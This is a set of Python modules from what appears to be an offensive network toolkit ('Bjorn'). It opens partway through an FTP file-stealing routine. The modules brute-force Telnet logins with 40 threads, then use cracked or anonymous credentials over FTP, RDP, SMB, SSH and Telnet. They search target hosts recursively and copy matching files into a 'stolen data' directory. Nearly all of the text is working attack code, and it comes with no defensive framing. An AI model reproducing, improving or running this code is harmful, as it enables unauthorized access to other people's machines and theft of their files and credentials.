if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

184
actions/steal_files_rdp.py Normal file
View File

@@ -0,0 +1,184 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

223
actions/steal_files_smb.py Normal file
View File

@@ -0,0 +1,223 @@
import os
import logging
from rich.console import Console
from threading import Timer
import time
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
"""
Establish an SMB connection.
"""
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
self.smb_connected = True
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
except Exception as e:
logger.error(f"Error listing shares: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

173
actions/steal_files_ssh.py Normal file
View File

@@ -0,0 +1,173 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import paramiko
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit :
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using SSH.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,180 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

206
actions/telnet_connector.py Normal file
View File

@@ -0,0 +1,206 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")